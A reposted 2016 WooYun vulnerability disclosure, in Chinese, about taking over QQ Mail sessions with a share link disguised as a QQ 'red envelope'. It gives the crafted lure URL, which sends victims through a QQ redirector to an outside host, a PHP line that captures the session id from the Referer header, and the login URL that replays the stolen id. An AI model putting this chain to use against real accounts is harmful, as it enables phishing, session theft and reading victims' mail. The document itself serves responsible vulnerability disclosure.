神刀安全网

漏洞标题: 我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)

漏洞详情

披露状态:

2016-01-25: 细节已通知厂商并且等待厂商处理中
2016-01-25: 厂商已经确认,细节仅向厂商公开
2016-02-04: 细节向核心白帽子及相关领域专家公开
2016-02-14: 细节向普通白帽子公开
2016-02-24: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)

详细说明:

code 区域
http://connect.qq.com/widget/shareqq/index.html?url=http://jump.qt.qq.com/php/jump/check_url/?url=http://jieshousid.com/f.php&desc=&title=&summary=&pics=https://mqq-imgcache.gtimg.cn/res/mqq/hongbao/img/message_logo_100.png&flash=&site=&style=201&width=32&height=32

这个可以自行构造更具诱惑的链接

如:

漏洞标题:  我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)

脚本f.php

code 区域
$_SERVER['HTTP_REFERER'];

获取Referer

漏洞标题:  我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)

得到sid 构造如下链接即可进入qq邮箱:

http://w.mail.qq.com/cgi-bin/login?3g_sid=获取到的sid&3g_style=1&fun=from3g

漏洞标题:  我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮